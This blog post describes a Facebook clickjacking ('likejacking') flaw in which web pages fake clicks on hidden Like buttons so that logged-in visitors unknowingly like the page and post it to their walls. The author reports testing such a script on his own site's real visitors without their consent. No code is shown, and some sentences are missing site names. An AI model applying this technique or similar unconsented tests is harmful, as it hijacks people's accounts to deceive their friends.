Bill Hartzer

Facebook Account Security Flaw: Sites Auto Posting on Users’ Facebook Walls Without Permission

Even after leaving, a serious flaw in Facebook‘s account security allows any website to post and “Like” a page without the user’s knowledge or permission.

Simple JavaScript code that is freely available, placed on any web page, will automatically “Like” a URL and post about it on Facebook Users’ walls without their permission or knowledge. A recent test of this JavaScript code revealed that the code was able to auto “Like” and successfully post on over 30 percent of the users’ Facebook walls without their knowledge or permission. This is a serious security flaw in Facebook’s account security that must be fixed.

Imagine visiting your Facebook account, viewing your Facebook Timeline, making a few posts on your Facebook wall, updating your status. Then you leave, without logging out of Facebook, and go to a few other websites. You know, the usual daily routine. For many, it’s easier to just leave and go to other websites without logging out of your Facebook account. When you go back to, you’re already logged in–you don’t to type your Facebook user Id and password again. You can go right to your Facebook timeline, to see all of the updates from your Facebook friends.

That is where this Facebook security flaw comes into play. Devious web site owners (some technically call them “Black Hat” webmasters) are taking advantage of Facebook users. By installing simple JavaScript code on their web site, webmasters are able to “fake” a click on a hidden Facebook “Like” button on their site. And then they post on your Facebook Wall about it, which promotes their URL or web site to all of YOUR Facebook Friends. And you never see the click or the Facebook “Like”, and you most likely will not see that you posted about their web site on your Facebook Status unless you go to and view your Facebook Wall. Most Facebook users will never know that they are promoting web sites that they recently visited unless someone tells them about it–because Facebook is designed in a way for us to see all of our friends’ updates on our timeline. It takes a separate click on the Facebook site to view your own Facebook Status updates.

Security Flaw Effects 31 Percent of Web Site Visitors
In a recent test during a two week period, I installed a version of some “Auto Like” and “Auto Post on Facebook Wall” JavaScript code on a web site that I own. After running the test on the web site for two weeks (the code has now been removed from the site), the results were impressive but disturbing. The average web site visitors to this web site are what I would call “very tech savvy” people. On this particular test web site where I ran the script, the Average Bounce Rate is 52.41 percent. The Average Time on Site is 7:04 minutes. 54.62 percent were New Visits. Here are some statistics about the users to this particular test web site:

52.41% Bounce Rate
7:04 minutes Avg. Time on Site
54.62% New visits
45.64% Firefox Users
34.20% Chrome Users
9.36% Internet Explorer Users

Referring Web Sites:
38.24% New Visits Direct to Site
71.27% New Visits from Google
61.90% New Visits from
83.33% New visits from
30.8% Users who Auto Liked and Auto Posted on their Facebook Wall

Nearly 31 Percent of these tech-savvy users who visited the test web site were still logged into Facebook–and the script caused them to automatically “Like” the page and automatically posted on their Facebook Wall that they liked the web site–promoting the web site to all of their Facebook Friends. And although the about half of the new visits were direct visits to the test web site, the 3rd and 4th most popular referring site was Facebook (I am assuming that they came because someone had promoted the web site on their Facebook status). 62 percent were from and a whopping 83 percent were new visits from the mobile version of

What is disturbing here is the fact that when you visit a website. Not only will you “Like” a URL of the web site owner’s choosing, the web site will also automatically post on your Facebook Wall without you even knowing it. If you are logged into your Facebook account, even though you are NOT on, any website can automatically post on your Facebook Wall without your knowledge. This is a serious Facebook security flaw that Facebook needs to address right away.

How You can Stop Facebook Account Security Flaw
At this point, there is really only one way that you personally can stop web sites from automatically posting and auto “Liking” when you visit their web site. When you visit you should log in–and when you leave, you should log out. As long at you are technically logged out of, there is no way that a devious web site owner can force you to automatically “like” their web site–and they cannot automatically post to your Facebook Wall.

Facebook absolutely needs to take action right away so that this cannot continue to happen. Facebook must protect the integrity of the Facebook “Like” system, or a Facebook “Like” will be meaningless in the future. A good start would be for Facebook to implement some sort of Captcha Code as a part of the Facebook “Likes”, which would be a good step in the right direction here.

Exit mobile version